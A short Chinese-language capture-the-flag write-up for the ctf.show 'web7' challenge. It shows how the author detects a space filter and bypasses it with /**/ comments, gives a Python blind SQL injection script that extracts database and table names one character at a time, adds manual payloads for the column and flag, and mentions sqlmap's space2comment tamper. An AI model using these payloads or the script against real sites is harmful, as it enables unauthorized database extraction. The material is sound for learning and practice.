web7
我一直在想,如果关键字被过滤了,怎么去判读字段长度?
其实盲注的话,貌似就没有这个麻烦了
做题之前先判断哪些关键字被过滤了,
index.php?id=1'or1=1#
index.php?id=1'or 1=1#
一碰到空格就报错,空格被过滤
盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题
import requests
url = "https://7785f4a8-dd2f-4a53-acb5-61d19f2c5c57.chall.ctf.show/index.php?id=-1'/**/"
def db(url): # 爆库名
for i in range(1, 5):
for j in range(32, 128):
u = "or/**/ascii(substr(database()/**/from/**/" + str(i) + "/**/for/**/1))=" + str(j) + "#"
s = url + u
print(s)
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
print(chr(j))
def table(url): # 爆表名
for i in range(4):
table_name = ''
for j in range(1, 6):
for k in range(48, 128):
u = id = "||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/" + str(
i) + ")/**/from/**/" + str(j) + "/**/for/**/1))=" + str(k) + "#"
s = url + u
print(s)
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
table_name += chr(k)
print(table_name)
db(url);
table(url);
库名web7,表名flag,page,user
很遗憾最后模仿大佬脚本,爆column名没法爆出
最后两步手动
id=-1'/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102#
id=-1'/**/or/**/ascii(substr((select/**/flag/**/from/**/flag/**/limit/**/0,1),1,1))=102#
如果用sqlmap,这题其实会简单一点,我们使用tamper脚本,加载space2comment
因为我们已知过滤了空格,而这tamper就是将空格替换成/**/
最后结果比脚本注的全一点